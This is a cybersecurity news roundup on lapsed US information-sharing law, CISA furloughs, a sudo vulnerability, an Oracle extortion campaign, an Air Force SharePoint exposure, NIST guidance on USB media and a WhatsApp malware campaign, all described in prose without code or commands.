Top stories.
- The Cybersecurity Information Sharing Act fails to be reauthorized.
- CISA's workforce is furloughed amidst the government shutdown.
- CISA issues urgent warning about sudo vulnerability.
- Oracle customers targeted by extortion campaign.
- US Airforce investigating a SharePoint breach.
- NIST publishes new guide for managing USB threats.
- Malware campaign targets WhatsApp.
Cyber information-sharing law and state grants go dark.
Two significant federal cybersecurity programs expired Wednesday morning after Congress remained deadlocked over government funding. Both the Cybersecurity Information Sharing Act of 2015, which enables the sharing of critical threat intelligence, and the $1 billion State and Local Cybersecurity Grant Programs lapsed without reauthorization.
While the House of Representatives did advance renewal bills earlier this month, the Senate's gridlock stalled these measures. Former CISA deputy director Nitin Natarajan stated that both of these programs are critical for resilience, particularly for smaller jurisdictions. Further, Natarajan warned that threat sharing and cyber defense will diminish without these programs.
CISA's workforce is furloughed due to government shutdown.
The US Cybersecurity and Infrastructure Security Agency (CISA) has furloughed most of its workforce due to the ongoing government shutdown. Roughly 35% of the staff remain active, though more can be recalled in the event of an emergency. Experts expressed concern that the timing could impact efforts to combat ransomware and Chinese state-linked hacking campaigns.
Agency spokeswoman, Marci McCarthy, wrote that "while a government shutdown can disrupt federal operations, CISA will sustain essential functions and provide timely guidance to minimize disruptions."
CISA issues an urgent warning about active exploitation of a sudo utility critical vulnerability.
The Cybersecurity and Infrastructure Security Agency (CISA) has issued an urgent warning about the active exploitation of a critical vulnerability in the sudo utility. The vulnerability, known as CVE-2025-32463, impacts sudo's -R (chroot) option and allows attackers with limited sudo rights to bypass restrictions and gain full root access.
CISA warned that successful exploitation could result in complete system compromise, enabling data theft, service disruption, or malware installation. Additionally, CISA urged administrators to identify vulnerable systems, apply vendor patches, or disable the chroot option until fixes are available.
Large-scale extortion campaign targets Oracle customers.
Google has released a statement warning executives from several companies about an extortion campaign targeting Oracle customers. The extortion emails are being sent to both executives at large organizations and their IT departments. In return for not revealing sensitive information, the attackers are demanding ransoms that have reached $50 million. Google noted that attackers were sending these emails to "executives at numerous organizations claiming to have stolen sensitive data from their Oracle E-Business Suite."
Oracle is investigating the matter and says the crooks don't appear to be exploiting any zero-days. The company said in a statement. "Oracle is aware that some Oracle E-Business Suite (EBS) customers have received extortion emails. Our ongoing investigation has found the potential use of previously identified vulnerabilities that are addressed in the July 2025 Critical Patch Update. Oracle reaffirms its strong recommendation that customers apply the latest Critical Patch Updates."
US Air Force investigates SharePoint breach.
The US Air Force confirmed it is investigating a "privacy-related" issue after Microsoft's SharePoint was breached. A breach notice warned that all Air Force SharePoint systems would be shut down for two weeks. The notice stated:
"This message is to inform you of a critical Personally Identifiable Information (PII) and Protected Health Information (PHI) exposure related to USAF SharePoint Permissions. As a result of this breach, all USAF SharePoints will be blocked Air Force-wide to protect sensitive information."
It is unclear what, if any, services are offline at the moment. Both the Air Force and Microsoft have not confirmed any disruptions.
NIST publishes new guide for protecting ICS against USB-borne threats.
The National Institute of Standards and Technology (NIST) published Special Publication 1334, which is a concise guide to managing cybersecurity risks from removable media in OT environments. The guide specifically highlights USB flash drives as both a valuable tool and a major threat.
The two-page guide outlines procedural, physical, technical, and transportation controls, strict policies, secure storage methods, malware scanning, and data sanitization practices. NIST warned that "if a USB device is infected with malware, it can spread to the industrial control system and cause problems, such as disrupting operations or compromising safety."
WhatsApp targeted by fast-spreading malware campaign.
A fast-spreading malware campaign is utilizing WhatsApp as both a lure and a launchpad. Originally seen in September 2025, the self-propagating malware, known as SORVEPOTEL, spreads through phishing messages with ZIP files that are disguised as receipts or budgets.
Once opened, a hidden Windows shortcut executes an encoded PowerShell command that fetches additional payloads, establishes persistence, and connects to attacker-controlled domains. Afterward, the malware can hijack active WhatsApp sessions and replicate itself to all contacts and groups.
Analysts noted that attackers can also distribute similar ZIPs via phishing emails appearing to come from legitimate institutions.
